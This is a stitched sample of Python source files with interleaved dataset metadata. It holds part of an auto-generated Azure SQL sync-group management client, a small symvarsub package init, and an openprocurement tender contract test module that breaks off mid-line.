response.headers.get('x-ms-request-id') raise exp if raw: client_raw_response = ClientRawResponse(None, response) return client_raw_response cancel_sync.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Sql/servers/{serverName}/databases/{databaseName}/syncGroups/{syncGroupName}/cancelSync'} def trigger_sync( self, resource_group_name, server_name, database_name, sync_group_name, custom_headers=None, raw=False, **operation_config): """Triggers a sync group synchronization. :param resource_group_name: The name of the resource group that contains the resource. You can obtain this value from the Azure Resource Manager API or the portal. :type resource_group_name: str :param server_name: The name of the server. :type server_name: str :param database_name: The name of the database on which the sync group is hosted. :type database_name: str :param sync_group_name: The name of the sync group. :type sync_group_name: str :param dict custom_headers: headers that will be added to the request :param bool raw: returns the direct response alongside the deserialized response :param operation_config: :ref:`Operation configuration overrides<msrest:optionsforoperations>`. :return: None or ClientRawResponse if raw=true :rtype: None or ~msrest.pipeline.ClientRawResponse :raises: :class:`CloudError<msrestazure.azure_exceptions.CloudError>` """ # Construct URL url = self.trigger_sync.metadata['url'] path_format_arguments = { 'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str'), 'serverName': self._serialize.url("server_name", server_name, 'str'), 'databaseName': self._serialize.url("database_name", database_name, 'str'), 'syncGroupName': self._serialize.url("sync_group_name", sync_group_name, 'str'), 'subscriptionId': self._serialize.url("self.config.subscription_id", self.config.subscription_id, 'str') } url = self._client.format_url(url, **path_format_arguments) # Construct parameters query_parameters = {} query_parameters['api-version'] = self._serialize.query("self.api_version", self.api_version, 'str') # Construct headers header_parameters = {} if self.config.generate_client_request_id: header_parameters['x-ms-client-request-id'] = str(uuid.uuid1()) if custom_headers: header_parameters.update(custom_headers) if self.config.accept_language is not None: header_parameters['accept-language'] = self._serialize.header("self.config.accept_language", self.config.accept_language, 'str') # Construct and send request request = self._client.post(url, query_parameters, header_parameters) response = self._client.send(request, stream=False, **operation_config) if response.status_code not in [200]: exp = CloudError(response) exp.request_id = response.headers.get('x-ms-request-id') raise exp if raw: client_raw_response = ClientRawResponse(None, response) return client_raw_response trigger_sync.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Sql/servers/{serverName}/databases/{databaseName}/syncGroups/{syncGroupName}/triggerSync'} def get( self, resource_group_name, server_name, database_name, sync_group_name, custom_headers=None, raw=False, **operation_config): """Gets a sync group. :param resource_group_name: The name of the resource group that contains the resource. You can obtain this value from the Azure Resource Manager API or the portal. :type resource_group_name: str :param server_name: The name of the server. :type server_name: str :param database_name: The name of the database on which the sync group is hosted. :type database_name: str :param sync_group_name: The name of the sync group. :type sync_group_name: str :param dict custom_headers: headers that will be added to the request :param bool raw: returns the direct response alongside the deserialized response :param operation_config: :ref:`Operation configuration overrides<msrest:optionsforoperations>`. :return: SyncGroup or ClientRawResponse if raw=true :rtype: ~azure.mgmt.sql.models.SyncGroup or ~msrest.pipeline.ClientRawResponse :raises: :class:`CloudError<msrestazure.azure_exceptions.CloudError>` """ # Construct URL url = self.get.metadata['url'] path_format_arguments = { 'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str'), 'serverName': self._serialize.url("server_name", server_name, 'str'), 'databaseName': self._serialize.url("database_name", database_name, 'str'), 'syncGroupName': self._serialize.url("sync_group_name", sync_group_name, 'str'), 'subscriptionId': self._serialize.url("self.config.subscription_id", self.config.subscription_id, 'str') } url = self._client.format_url(url, **path_format_arguments) # Construct parameters query_parameters = {} query_parameters['api-version'] = self._serialize.query("self.api_version", self.api_version, 'str') # Construct headers header_parameters = {} header_parameters['Accept'] = 'application/json' if self.config.generate_client_request_id: header_parameters['x-ms-client-request-id'] = str(uuid.uuid1()) if custom_headers: header_parameters.update(custom_headers) if self.config.accept_language is not None: header_parameters['accept-language'] = self._serialize.header("self.config.accept_language", self.config.accept_language, 'str') # Construct and send request request = self._client.get(url, query_parameters, header_parameters) response = self._client.send(request, stream=False, **operation_config) if response.status_code not in [200]: exp = CloudError(response) exp.request_id = response.headers.get('x-ms-request-id') raise exp deserialized = None if response.status_code == 200: deserialized = self._deserialize('SyncGroup', response) if raw: client_raw_response = ClientRawResponse(deserialized, response) return client_raw_response return deserialized get.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Sql/servers/{serverName}/databases/{databaseName}/syncGroups/{syncGroupName}'} def _create_or_update_initial( self, resource_group_name, server_name, database_name, sync_group_name, parameters, custom_headers=None, raw=False, **operation_config): # Construct URL url = self.create_or_update.metadata['url'] path_format_arguments = { 'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str'), 'serverName': self._serialize.url("server_name", server_name, 'str'), 'databaseName': self._serialize.url("database_name", database_name, 'str'), 'syncGroupName': self._serialize.url("sync_group_name", sync_group_name, 'str'), 'subscriptionId': self._serialize.url("self.config.subscription_id", self.config.subscription_id, 'str') } url = self._client.format_url(url, **path_format_arguments) # Construct parameters query_parameters = {} query_parameters['api-version'] = self._serialize.query("self.api_version", self.api_version, 'str') # Construct headers header_parameters = {} header_parameters['Accept'] = 'application/json' header_parameters['Content-Type'] = 'application/json; charset=utf-8' if self.config.generate_client_request_id: header_parameters['x-ms-client-request-id'] = str(uuid.uuid1()) if custom_headers: header_parameters.update(custom_headers) if self.config.accept_language is not None: header_parameters['accept-language'] = self._serialize.header("self.config.accept_language", self.config.accept_language, 'str') # Construct body body_content = self._serialize.body(parameters, 'SyncGroup') # Construct and send request request = self._client.put(url, query_parameters, header_parameters, body_content) response = self._client.send(request, stream=False, **operation_config) if response.status_code not in [200, 201, 202]: exp = CloudError(response) exp.request_id = response.headers.get('x-ms-request-id') raise exp deserialized = None if response.status_code == 200: deserialized = self._deserialize('SyncGroup', response) if response.status_code == 201: deserialized = self._deserialize('SyncGroup', response) if raw: client_raw_response = ClientRawResponse(deserialized, response) return client_raw_response return deserialized def create_or_update( self, resource_group_name, server_name, database_name, sync_group_name, parameters, custom_headers=None, raw=False, polling=True, **operation_config): """Creates or updates a sync group. :param resource_group_name: The name of the resource group that contains the resource. You can obtain this value from the Azure Resource Manager API or the portal. :type resource_group_name: str :param server_name: The name of the server. :type server_name: str :param database_name: The name of the database on which the sync group is hosted. :type database_name: str :param sync_group_name: The name of the sync group. :type sync_group_name: str :param parameters: The requested sync group resource state. :type parameters: ~azure.mgmt.sql.models.SyncGroup :param dict custom_headers: headers that will be added to the request :param bool raw: The poller return type is ClientRawResponse, the direct response alongside the deserialized response :param polling: True for ARMPolling, False for no polling, or a polling object for personal polling strategy :return: An instance of LROPoller that returns SyncGroup or ClientRawResponse<SyncGroup> if raw==True :rtype: ~msrestazure.azure_operation.AzureOperationPoller[~azure.mgmt.sql.models.SyncGroup] or ~msrestazure.azure_operation.AzureOperationPoller[~msrest.pipeline.ClientRawResponse[~azure.mgmt.sql.models.SyncGroup]] :raises: :class:`CloudError<msrestazure.azure_exceptions.CloudError>` """ raw_result = self._create_or_update_initial( resource_group_name=resource_group_name, server_name=server_name, database_name=database_name, sync_group_name=sync_group_name, parameters=parameters, custom_headers=custom_headers, raw=True, **operation_config ) def get_long_running_output(response): deserialized = self._deserialize('SyncGroup', response) if raw: client_raw_response = ClientRawResponse(deserialized, response) return client_raw_response return deserialized lro_delay = operation_config.get( 'long_running_operation_timeout', self.config.long_running_operation_timeout) if polling is True: polling_method = ARMPolling(lro_delay, **operation_config) elif polling is False: polling_method = NoPolling() else: polling_method = polling return LROPoller(self._client, raw_result, get_long_running_output, polling_method) create_or_update.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Sql/servers/{serverName}/databases/{databaseName}/syncGroups/{syncGroupName}'} def _delete_initial( self, resource_group_name, server_name, database_name, sync_group_name, custom_headers=None, raw=False, **operation_config): # Construct URL url = self.delete.metadata['url'] path_format_arguments = { 'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str'), 'serverName': self._serialize.url("server_name", server_name, 'str'), 'databaseName': self._serialize.url("database_name", database_name, 'str'), 'syncGroupName': self._serialize.url("sync_group_name", sync_group_name, 'str'), 'subscriptionId': self._serialize.url("self.config.subscription_id", self.config.subscription_id, 'str') } url = self._client.format_url(url, **path_format_arguments) # Construct parameters query_parameters = {} query_parameters['api-version'] = self._serialize.query("self.api_version", self.api_version, 'str') # Construct headers header_parameters = {} if self.config.generate_client_request_id: header_parameters['x-ms-client-request-id'] = str(uuid.uuid1()) if custom_headers: header_parameters.update(custom_headers) if self.config.accept_language is not None: header_parameters['accept-language'] = self._serialize.header("self.config.accept_language", self.config.accept_language, 'str') # Construct and send request request = self._client.delete(url, query_parameters, header_parameters) response = self._client.send(request, stream=False, **operation_config) if response.status_code not in [200, 202, 204]: exp = CloudError(response) exp.request_id = response.headers.get('x-ms-request-id') raise exp if raw: client_raw_response = ClientRawResponse(None, response) return client_raw_response def delete( self, resource_group_name, server_name, database_name, sync_group_name, custom_headers=None, raw=False, polling=True, **operation_config): """Deletes a sync group. :param resource_group_name: The name of the resource group that contains the resource. You can obtain this value from the Azure Resource Manager API or the portal. :type resource_group_name: str :param server_name: The name of the server. :type server_name: str :param database_name: The name of the database on which the sync group is hosted. :type database_name: str :param sync_group_name: The name of the sync group. :type sync_group_name: str :param dict custom_headers: headers that will be added to the request :param bool raw: The poller return type is ClientRawResponse, the direct response alongside the deserialized response :param polling: True for ARMPolling, False for no polling, or a polling object for personal polling strategy :return: An instance of LROPoller that returns None or ClientRawResponse<None> if raw==True :rtype: ~msrestazure.azure_operation.AzureOperationPoller[None] or ~msrestazure.azure_operation.AzureOperationPoller[~msrest.pipeline.ClientRawResponse[None]] :raises: :class:`CloudError<msrestazure.azure_exceptions.CloudError>` """ raw_result = self._delete_initial( resource_group_name=resource_group_name, server_name=server_name, database_name=database_name, sync_group_name=sync_group_name, custom_headers=custom_headers, raw=True, **operation_config ) def get_long_running_output(response): if raw: client_raw_response = ClientRawResponse(None, response) return client_raw_response lro_delay = operation_config.get( 'long_running_operation_timeout', self.config.long_running_operation_timeout) if polling is True: polling_method = ARMPolling(lro_delay, **operation_config) elif polling is False: polling_method = NoPolling() else: polling_method = polling return LROPoller(self._client, raw_result, get_long_running_output, polling_method) delete.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Sql/servers/{serverName}/databases/{databaseName}/syncGroups/{syncGroupName}'} def _update_initial( self, resource_group_name, server_name, database_name, sync_group_name, parameters, custom_headers=None, raw=False, **operation_config): # Construct URL url = self.update.metadata['url'] path_format_arguments = { 'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str'), 'serverName': self._serialize.url("server_name", server_name, 'str'), 'databaseName': self._serialize.url("database_name", database_name, 'str'), 'syncGroupName': self._serialize.url("sync_group_name", sync_group_name, 'str'), 'subscriptionId': self._serialize.url("self.config.subscription_id", self.config.subscription_id, 'str') } url = self._client.format_url(url, **path_format_arguments) # Construct parameters query_parameters = {} query_parameters['api-version'] = self._serialize.query("self.api_version", self.api_version, 'str') # Construct headers header_parameters = {} header_parameters['Accept'] = 'application/json' header_parameters['Content-Type'] = 'application/json; charset=utf-8' if self.config.generate_client_request_id: header_parameters['x-ms-client-request-id'] = str(uuid.uuid1()) if custom_headers: header_parameters.update(custom_headers) if self.config.accept_language is not None: header_parameters['accept-language'] = self._serialize.header("self.config.accept_language", self.config.accept_language, 'str') # Construct body body_content = self._serialize.body(parameters, 'SyncGroup') # Construct and send request request = self._client.patch(url, query_parameters, header_parameters, body_content) response = self._client.send(request, stream=False, **operation_config) if response.status_code not in [200, 202]: exp = CloudError(response) exp.request_id = response.headers.get('x-ms-request-id') raise exp deserialized = None if response.status_code == 200: deserialized = self._deserialize('SyncGroup', response) if raw: client_raw_response = ClientRawResponse(deserialized, response) return client_raw_response return deserialized def update( self, resource_group_name, server_name, database_name, sync_group_name, parameters, custom_headers=None, raw=False, polling=True, **operation_config): """Updates a sync group. :param resource_group_name: The name of the resource group that contains the resource. You can obtain this value from the Azure Resource Manager API or the portal. :type resource_group_name: str :param server_name: The name of the server. :type server_name: str :param database_name: The name of the database on which the sync group is hosted. :type database_name: str :param sync_group_name: The name of the sync group. :type sync_group_name: str :param parameters: The requested sync group resource state. :type parameters: ~azure.mgmt.sql.models.SyncGroup :param dict custom_headers: headers that will be added to the request :param bool raw: The poller return type is ClientRawResponse, the direct response alongside the deserialized response :param polling: True for ARMPolling, False for no polling, or a polling object for personal polling strategy :return: An instance of LROPoller that returns SyncGroup or ClientRawResponse<SyncGroup> if raw==True :rtype: ~msrestazure.azure_operation.AzureOperationPoller[~azure.mgmt.sql.models.SyncGroup] or ~msrestazure.azure_operation.AzureOperationPoller[~msrest.pipeline.ClientRawResponse[~azure.mgmt.sql.models.SyncGroup]] :raises: :class:`CloudError<msrestazure.azure_exceptions.CloudError>` """ raw_result = self._update_initial( resource_group_name=resource_group_name, server_name=server_name, database_name=database_name, sync_group_name=sync_group_name, parameters=parameters, custom_headers=custom_headers, raw=True, **operation_config ) def get_long_running_output(response): deserialized = self._deserialize('SyncGroup', response) if raw: client_raw_response = ClientRawResponse(deserialized, response) return client_raw_response return deserialized lro_delay = operation_config.get( 'long_running_operation_timeout', self.config.long_running_operation_timeout) if polling is True: polling_method = ARMPolling(lro_delay, **operation_config) elif polling is False: polling_method = NoPolling() else: polling_method = polling return LROPoller(self._client, raw_result, get_long_running_output, polling_method) update.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Sql/servers/{serverName}/databases/{databaseName}/syncGroups/{syncGroupName}'} def list_by_database( self, resource_group_name, server_name, database_name, custom_headers=None, raw=False, **operation_config): """Lists sync groups under a hub database. :param resource_group_name: The name of the resource group that contains the resource. You can obtain this value from the Azure Resource Manager API or the portal. :type resource_group_name: str :param server_name: The name of the server. :type server_name: str :param database_name: The name of the database on which the sync group is hosted. :type database_name: str :param dict custom_headers: headers that will be added to the request :param bool raw: returns the direct response alongside the deserialized response :param operation_config: :ref:`Operation configuration overrides<msrest:optionsforoperations>`. :return: An iterator like instance of SyncGroup :rtype: ~azure.mgmt.sql.models.SyncGroupPaged[~azure.mgmt.sql.models.SyncGroup] :raises: :class:`CloudError<msrestazure.azure_exceptions.CloudError>` """ def internal_paging(next_link=None, raw=False): if not next_link: # Construct URL url = self.list_by_database.metadata['url'] path_format_arguments = { 'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str'), 'serverName': self._serialize.url("server_name", server_name, 'str'), 'databaseName': self._serialize.url("database_name", database_name, 'str'), 'subscriptionId': self._serialize.url("self.config.subscription_id", self.config.subscription_id, 'str') } url = self._client.format_url(url, **path_format_arguments) # Construct parameters query_parameters = {} query_parameters['api-version'] = self._serialize.query("self.api_version", self.api_version, 'str') else: url = next_link query_parameters = {} # Construct headers header_parameters = {} header_parameters['Accept'] = 'application/json' if self.config.generate_client_request_id: header_parameters['x-ms-client-request-id'] = str(uuid.uuid1()) if custom_headers: header_parameters.update(custom_headers) if self.config.accept_language is not None: header_parameters['accept-language'] = self._serialize.header("self.config.accept_language", self.config.accept_language, 'str') # Construct and send request request = self._client.get(url, query_parameters, header_parameters) response = self._client.send(request, stream=False, **operation_config) if response.status_code not in [200]: exp = CloudError(response) exp.request_id = response.headers.get('x-ms-request-id') raise exp return response # Deserialize response deserialized = models.SyncGroupPaged(internal_paging, self._deserialize.dependencies) if raw: header_dict = {} client_raw_response = models.SyncGroupPaged(internal_paging, self._deserialize.dependencies, header_dict) return client_raw_response return deserialized list_by_database.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Sql/servers/{serverName}/databases/{databaseName}/syncGroups'}
49.535565
225
0.667202
5,262
47,356
5.779932
0.050361
0.035214
0.034655
0.017097
0.919313
0.912244
0.908562
0.902052
0.899323
0.899323
0
0.002589
0.241553
47,356
955
226
49.587435
0.844196
0.276734
0
0.814
0
0.02
0.164848
0.0846
0
0
0
0
0
1
0.048
false
0
0.012
0
0.128
0
0
0
0
null
0
0
0
1
1
1
1
1
1
0
0
0
0
0
0
0
0
0
0
1
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
7
6fa28a38a71fc5dfde80bc3ce0cac7121e4b6e4a
183
py
Python
symvarsub/numtransform/__init__.py
bjodah/symvarsub
aebbd3aabdc9f8c345c5892f5d3a0beebbbf906d
[ "BSD-2-Clause" ]
null
null
null
symvarsub/numtransform/__init__.py
bjodah/symvarsub
aebbd3aabdc9f8c345c5892f5d3a0beebbbf906d
[ "BSD-2-Clause" ]
null
null
null
symvarsub/numtransform/__init__.py
bjodah/symvarsub
aebbd3aabdc9f8c345c5892f5d3a0beebbbf906d
[ "BSD-2-Clause" ]
null
null
null
from __future__ import (absolute_import, division, print_function) from .numtransform import NumTransformer from .numtransform import lambdify assert NumTransformer assert lambdify
22.875
66
0.857923
20
183
7.55
0.55
0.211921
0.291391
0
0
0
0
0
0
0
0
0
0.10929
183
7
67
26.142857
0.92638
0
0
0
0
0
0
0
0
0
0
0
0.4
1
0
true
0
0.6
0
0.6
0.2
1
0
0
null
1
1
0
0
0
0
0
0
0
0
0
0
0
1
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
1
0
1
0
1
0
0
7
6fe98df84c595217c58f0a5f8c8d963e729a5ace
49,659
py
Python
src/openprocurement/tender/belowthreshold/tests/contract_blanks.py
scrubele/prozorro-testing
42b93ea2f25d8cc40e66c596f582c7c05e2a9d76
[ "Apache-2.0" ]
null
null
null
src/openprocurement/tender/belowthreshold/tests/contract_blanks.py
scrubele/prozorro-testing
42b93ea2f25d8cc40e66c596f582c7c05e2a9d76
[ "Apache-2.0" ]
2
2021-03-25T23:27:04.000Z
2022-03-21T22:18:15.000Z
src/openprocurement/tender/belowthreshold/tests/contract_blanks.py
scrubele/prozorro-testing
42b93ea2f25d8cc40e66c596f582c7c05e2a9d76
[ "Apache-2.0" ]
null
null
null
# -*- coding: utf-8 -*- from datetime import timedelta from copy import deepcopy from openprocurement.api.utils import get_now from openprocurement.tender.belowthreshold.tests.base import test_author # TenderContractResourceTest def create_tender_contract_invalid(self): self.app.authorization = ("Basic", ("token", "")) response = self.app.post_json( "/tenders/some_id/contracts", {"data": {"title": "contract title", "description": "contract description", "awardID": self.award_id}}, status=404, ) self.assertEqual(response.status, "404 Not Found") self.assertEqual(response.content_type, "application/json") self.assertEqual(response.json["status"], "error") self.assertEqual( response.json["errors"], [{u"description": u"Not Found", u"location": u"url", u"name": u"tender_id"}] ) request_path = "/tenders/{}/contracts".format(self.tender_id) response = self.app.post(request_path, "data", status=415) self.assertEqual(response.status, "415 Unsupported Media Type") self.assertEqual(response.content_type, "application/json") self.assertEqual(response.json["status"], "error") self.assertEqual( response.json["errors"], [ { u"description": u"Content-Type header should be one of ['application/json']", u"location": u"header", u"name": u"Content-Type", } ], ) response = self.app.post(request_path, "data", content_type="application/json", status=422) self.assertEqual(response.status, "422 Unprocessable Entity") self.assertEqual(response.content_type, "application/json") self.assertEqual(response.json["status"], "error") self.assertEqual( response.json["errors"], [{u"description": u"No JSON object could be decoded", u"location": u"body", u"name": u"data"}], ) response = self.app.post_json(request_path, "data", status=422) self.assertEqual(response.status, "422 Unprocessable Entity") self.assertEqual(response.content_type, "application/json") self.assertEqual(response.json["status"], "error") self.assertEqual( response.json["errors"], [{u"description": u"Data not available", u"location": u"body", u"name": u"data"}] ) response = self.app.post_json(request_path, {"not_data": {}}, status=422) self.assertEqual(response.status, "422 Unprocessable Entity") self.assertEqual(response.content_type, "application/json") self.assertEqual(response.json["status"], "error") self.assertEqual( response.json["errors"], [{u"description": u"Data not available", u"location": u"body", u"name": u"data"}] ) response = self.app.post_json(request_path, {"data": {"invalid_field": "invalid_value"}}, status=422) self.assertEqual(response.status, "422 Unprocessable Entity") self.assertEqual(response.content_type, "application/json") self.assertEqual(response.json["status"], "error") self.assertEqual( response.json["errors"], [{u"description": u"Rogue field", u"location": u"body", u"name": u"invalid_field"}] ) response = self.app.post_json(request_path, {"data": {"awardID": "invalid_value"}}, status=422) self.assertEqual(response.status, "422 Unprocessable Entity") self.assertEqual(response.content_type, "application/json") self.assertEqual(response.json["status"], "error") self.assertEqual( response.json["errors"], [{u"description": [u"awardID should be one of awards"], u"location": u"body", u"name": u"awardID"}], ) def create_tender_contract(self): self.app.authorization = ("Basic", ("token", "")) contract_items = deepcopy(self.award_items) for item in contract_items: item["quantity"] += 0.5 response = self.app.post_json( "/tenders/{}/contracts".format(self.tender_id), { "data": { "title": "contract title", "description": "contract description", "awardID": self.award_id, "value": { "amount": self.award_value["amount"], "valueAddedTaxIncluded": self.award_value["valueAddedTaxIncluded"], "currency": self.award_value["currency"], "amountNet": self.award_value["amount"], }, "suppliers": self.award_suppliers, "items": contract_items, } }, ) self.assertEqual(response.status, "201 Created") self.assertEqual(response.content_type, "application/json") contract = response.json["data"] self.assertIn("id", contract) self.assertIn("value", contract) self.assertIn("suppliers", contract) self.assertIn(contract["id"], response.headers["Location"]) self.assertEqual(contract["items"], contract_items) tender = self.db.get(self.tender_id) tender["contracts"][-1]["status"] = "terminated" self.db.save(tender) self.set_status("unsuccessful") response = self.app.post_json( "/tenders/{}/contracts".format(self.tender_id), {"data": {"title": "contract title", "description": "contract description", "awardID": self.award_id}}, status=403, ) self.assertEqual(response.status, "403 Forbidden") self.assertEqual(response.content_type, "application/json") self.assertEqual( response.json["errors"][0]["description"], "Can't add contract in current (unsuccessful) tender status" ) self.app.authorization = ("Basic", ("broker", "")) response = self.app.patch_json( "/tenders/{}/contracts/{}?acc_token={}".format(self.tender_id, contract["id"], self.tender_token), {"data": {"status": "active"}}, status=403, ) self.assertEqual(response.status, "403 Forbidden") self.assertEqual(response.content_type, "application/json") self.assertEqual( response.json["errors"][0]["description"], "Can't update contract in current (unsuccessful) tender status" ) def create_tender_contract_in_complete_status(self): self.app.authorization = ("Basic", ("token", "")) response = self.app.post_json( "/tenders/{}/contracts".format(self.tender_id), {"data": {"title": "contract title", "description": "contract description", "awardID": self.award_id}}, ) self.assertEqual(response.status, "201 Created") self.assertEqual(response.content_type, "application/json") contract = response.json["data"] self.assertIn("id", contract) self.assertIn(contract["id"], response.headers["Location"]) tender = self.db.get(self.tender_id) tender["contracts"][-1]["status"] = "terminated" self.db.save(tender) self.set_status("complete") response = self.app.post_json( "/tenders/{}/contracts".format(self.tender_id), {"data": {"title": "contract title", "description": "contract description", "awardID": self.award_id}}, status=403, ) self.assertEqual(response.status, "403 Forbidden") self.assertEqual(response.content_type, "application/json") self.assertEqual( response.json["errors"][0]["description"], "Can't add contract in current (complete) tender status" ) self.app.authorization = ("Basic", ("broker", "")) response = self.app.patch_json( "/tenders/{}/contracts/{}?acc_token={}".format(self.tender_id, contract["id"], self.tender_token), {"data": {"status": "active"}}, status=403, ) self.assertEqual(response.status, "403 Forbidden") self.assertEqual(response.content_type, "application/json") self.assertEqual( response.json["errors"][0]["description"], "Can't update contract in current (complete) tender status" ) def patch_tender_contract(self): self.app.authorization = ("Basic", ("token", "")) response = self.app.get("/tenders/{}/contracts".format(self.tender_id)) contract = response.json["data"][0] self.assertEqual(contract["value"]["amount"], contract["value"]["amountNet"]) self.app.authorization = ("Basic", ("broker", "")) response = self.app.patch_json( "/tenders/{}/contracts/{}?acc_token={}".format(self.tender_id, contract["id"], self.tender_token), {"data": {"status": "active"}}, status=403, ) self.assertEqual(response.status, "403 Forbidden") self.assertEqual(response.content_type, "application/json") self.assertIn("Can't sign contract before stand-still period end (", response.json["errors"][0]["description"]) self.set_status("complete", {"status": "active.awarded"}) token = self.initial_bids_tokens.values()[0] response = self.app.post_json( "/tenders/{}/awards/{}/complaints?acc_token={}".format(self.tender_id, self.award_id, token), { "data": { "title": "complaint title", "description": "complaint description", "author": test_author, "status": "claim", } }, ) self.assertEqual(response.status, "201 Created") complaint = response.json["data"] owner_token = response.json["access"]["token"] tender = self.db.get(self.tender_id) for i in tender.get("awards", []): i["complaintPeriod"]["endDate"] = i["complaintPeriod"]["startDate"] self.db.save(tender) response = self.app.patch_json( "/tenders/{}/contracts/{}?acc_token={}".format(self.tender_id, contract["id"], self.tender_token), {"data": {"value": {"amountNet": contract["value"]["amount"] - 1}}}, ) self.assertEqual(response.status, "200 OK") self.app.patch_json( "/tenders/{}/contracts/{}?acc_token={}".format(self.tender_id, contract["id"], self.tender_token), { "data": { "contractID": "myselfID", "items": [{"description": "New Description"}], "suppliers": [{"name": "New Name"}], } }, ) response = self.app.get("/tenders/{}/contracts/{}".format(self.tender_id, contract["id"])) self.assertEqual(response.json["data"]["contractID"], contract["contractID"]) self.assertEqual(response.json["data"]["items"], contract["items"]) self.assertEqual(response.json["data"]["suppliers"], contract["suppliers"]) response = self.app.patch_json( "/tenders/{}/contracts/{}?acc_token={}".format(self.tender_id, contract["id"], self.tender_token), {"data": {"value": {"currency": "USD"}}}, status=403, ) self.assertEqual(response.status, "403 Forbidden") self.assertEqual(response.json["errors"][0]["description"], "Can't update currency for contract value") response = self.app.patch_json( "/tenders/{}/contracts/{}?acc_token={}".format(self.tender_id, contract["id"], self.tender_token), {"data": {"dateSigned": i["complaintPeriod"]["endDate"]}}, status=422, ) self.assertEqual(response.status, "422 Unprocessable Entity") self.assertEqual( response.json["errors"], [ { u"description": [ u"Contract signature date should be after award complaint period end date ({})".format( i["complaintPeriod"]["endDate"] ) ], u"location": u"body", u"name": u"dateSigned", } ], ) one_hour_in_furure = (get_now() + timedelta(hours=1)).isoformat() response = self.app.patch_json( "/tenders/{}/contracts/{}?acc_token={}".format(self.tender_id, contract["id"], self.tender_token), {"data": {"dateSigned": one_hour_in_furure}}, status=422, ) self.assertEqual(response.status, "422 Unprocessable Entity") self.assertEqual( response.json["errors"], [ { u"description": [u"Contract signature date can't be in the future"], u"location": u"body", u"name": u"dateSigned", } ], ) custom_signature_date = get_now().isoformat() response = self.app.patch_json( "/tenders/{}/contracts/{}?acc_token={}".format(self.tender_id, contract["id"], self.tender_token), {"data": {"dateSigned": custom_signature_date}}, ) self.assertEqual(response.status, "200 OK") response = self.app.patch_json( "/tenders/{}/awards/{}/complaints/{}?acc_token={}".format( self.tender_id, self.award_id, complaint["id"], self.tender_token ), {"data": {"status": "answered", "resolutionType": "resolved", "resolution": "resolution text " * 2}}, ) self.assertEqual(response.status, "200 OK") self.assertEqual(response.content_type, "application/json") self.assertEqual(response.json["data"]["status"], "answered") self.assertEqual(response.json["data"]["resolutionType"], "resolved") self.assertEqual(response.json["data"]["resolution"], "resolution text " * 2) response = self.app.patch_json( "/tenders/{}/contracts/{}?acc_token={}".format(self.tender_id, contract["id"], self.tender_token), {"data": {"status": "active"}}, status=403, ) self.assertEqual(response.status, "403 Forbidden") self.assertEqual(response.content_type, "application/json") self.assertEqual(response.json["errors"][0]["description"], "Can't sign contract before reviewing all complaints") response = self.app.patch_json( "/tenders/{}/awards/{}/complaints/{}?acc_token={}".format( self.tender_id, self.award_id, complaint["id"], owner_token ), {"data": {"satisfied": True, "status": "resolved"}}, ) self.assertEqual(response.status, "200 OK") self.assertEqual(response.content_type, "application/json") self.assertEqual(response.json["data"]["status"], "resolved") response = self.app.patch_json( "/tenders/{}/contracts/{}?acc_token={}".format(self.tender_id, contract["id"], self.tender_token), {"data": {"status": "active"}}, ) self.assertEqual(response.status, "200 OK") self.assertEqual(response.content_type, "application/json") self.assertEqual(response.json["data"]["status"], "active") response = self.app.patch_json( "/tenders/{}/contracts/{}?acc_token={}".format(self.tender_id, contract["id"], self.tender_token), {"data": {"value": {"amount": 232}}}, status=403, ) self.assertEqual(response.status, "403 Forbidden") self.assertEqual( response.json["errors"][0]["description"], "Can't update contract in current (complete) tender status" ) response = self.app.patch_json( "/tenders/{}/contracts/{}?acc_token={}".format(self.tender_id, contract["id"], self.tender_token), {"data": {"contractID": "myselfID"}}, status=403, ) self.assertEqual(response.status, "403 Forbidden") self.assertEqual( response.json["errors"][0]["description"], "Can't update contract in current (complete) tender status" ) response = self.app.patch_json( "/tenders/{}/contracts/{}?acc_token={}".format(self.tender_id, contract["id"], self.tender_token), {"data": {"items": [{"description": "New Description"}]}}, status=403, ) self.assertEqual(response.status, "403 Forbidden") self.assertEqual( response.json["errors"][0]["description"], "Can't update contract in current (complete) tender status" ) response = self.app.patch_json( "/tenders/{}/contracts/{}?acc_token={}".format(self.tender_id, contract["id"], self.tender_token), {"data": {"suppliers": [{"name": "New Name"}]}}, status=403, ) self.assertEqual(response.status, "403 Forbidden") self.assertEqual( response.json["errors"][0]["description"], "Can't update contract in current (complete) tender status" ) response = self.app.patch_json( "/tenders/{}/contracts/{}?acc_token={}".format(self.tender_id, contract["id"], self.tender_token), {"data": {"status": "active"}}, status=403, ) self.assertEqual(response.status, "403 Forbidden") self.assertEqual(response.content_type, "application/json") self.assertEqual( response.json["errors"][0]["description"], "Can't update contract in current (complete) tender status" ) response = self.app.patch_json( "/tenders/{}/contracts/some_id?acc_token={}".format(self.tender_id, self.tender_token), {"data": {"status": "active"}}, status=404, ) self.assertEqual(response.status, "404 Not Found") self.assertEqual(response.content_type, "application/json") self.assertEqual(response.json["status"], "error") self.assertEqual( response.json["errors"], [{u"description": u"Not Found", u"location": u"url", u"name": u"contract_id"}] ) response = self.app.patch_json( "/tenders/some_id/contracts/some_id?acc_token={}".format(self.tender_token), {"data": {"status": "active"}}, status=404, ) self.assertEqual(response.status, "404 Not Found") self.assertEqual(response.content_type, "application/json") self.assertEqual(response.json["status"], "error") self.assertEqual( response.json["errors"], [{u"description": u"Not Found", u"location": u"url", u"name": u"tender_id"}] ) response = self.app.get("/tenders/{}/contracts/{}".format(self.tender_id, contract["id"])) self.assertEqual(response.status, 